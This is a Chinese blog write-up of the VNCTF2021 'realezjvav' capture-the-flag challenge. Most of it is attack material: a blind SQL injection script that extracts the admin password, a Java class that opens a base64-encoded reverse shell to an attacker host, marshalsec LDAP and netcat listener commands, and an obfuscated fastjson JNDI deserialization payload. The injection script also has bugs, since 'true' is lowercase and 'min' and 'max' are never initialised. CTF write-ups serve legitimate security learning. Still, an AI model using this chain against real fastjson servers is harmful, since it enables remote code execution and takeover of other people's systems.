[VNCTF2021]realezjvav复现

字数统计: 666字   |   阅读时长≈ 3分

前言

自己太菜了,VNCTF没做出来几个题,签到即退场。

考点

简单的SQL注入

fastjson Rce复现

复现

在Fastjson<=1.2.47存在fastjson反序列化漏洞。

关于Fastjson 1.2.47 可以看这篇文章 fastjson

这题根据提示Only the admin can get the right. 可以猜到用户名,password那里通过fuzz

image-20210316214000589

可以发现'#的时候会返回200,sleep,空格,benchmark等都被ban了,本题用的是笛卡尔积时间盲注。

payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import requests
from time import *

url="http://c56083ac-9da0-437e-9b51-5db047b150aa.jvav.vnctf2021.node4.buuoj.cn:82/user/login"
flag=""
for i in range(1,50):
    head = 32
    tail = 128
    while true:
        j=head+(tail-head)//2
        if j==min:
            flag+=chr(j)
            print(flag)
            break
        payload="-1'or if(ascii(substr(password,{},1))<{},(SELECT count(*) FROM information_schema.tables A,information_schema.tables B,information_schema.tables C),1)#".format(i,j)
        data={
            'username':'admin',
            'password':payload
        }
        try:
            r=requests.post(url=url,data=data,timeout=0.7)
            min=j
        except:
            max=j
        sleep(0.4)

跑出password,登录网站。

这个图片存放路径searchimage存在一个任意文件读取。

image-20210316214845265

1
2
3
4
5
6

<dependency>
	<groupId>com.alibaba</groupId>
	<artifactId>fastjson</artifactId>
	<version>1.2.27</version>
</dependency>

通过pom.xml可以看到fastion的依赖

再利用ldap协议进行攻击。

利用自己的VPS开三个端口,并启动http协议,端口1用作恶意java类,端口2用作开启ldap,端口3用作监听反弹shell

端口写一个java的exp,并进行javac生成类

1
2
3
4
5
6
public class Exploit { public Exploit() {try {
Runtime.getRuntime().exec( "bash -c
{echo,YmFzaCAtaSA+Ji9kZXYvdGNwL3h4Lnh4Lnh4Lnh4L3BvcnQyIDA+JjEK}|{base64,-d}| {bash,-i}"); } catch (Exception e) { e.printStackTrace();
} }
public static void main(String[] argv) { Exploit e = new Exploit();
} }

YmFzaCAtaSA+Ji9kZXYvdGNwL3h4Lnh4Lnh4Lnh4L3BvcnQyIDA+JjEK是一串反弹shell的base64。把这里改成自己的VPS地址和端口就好。

然后执行javac Exploit.java产生class。

在这个文件夹上启动http服务:

1
python3 -m http.server port1

端口2启动ldap服务,先在github上下载 marshalsec

然后用maven构建项目:

1
mvn clean package -DskipTests

进入targe目录,开启ldap服务:

1
2
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://x.x.x.x:port1#Exploit" port2

端口3执行监听反弹shell:

1
nc -lvnp port3

payload:

1
roleJson={"name":{"\u0040\u0074\u0079\u0070\u0065":"java.lang.Class","val":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c"},"x":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","dataSourceName":"ldap://x.x.x.x:port2/Exploit","\u0061\u0075\u0074\u006f\u0043\u006f\u006d\u006d\u0069\u0074":true}}}

image-20210316220526132

image-20210316220614741

谢谢你请我吃糖果

支付宝
微信

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

主要涉及技术:
Java后端开发、网络安全、
服务器配置、JAVA安全的学习、Linux

联系QQ:1170516014

一个19级计科专业的小菜鸡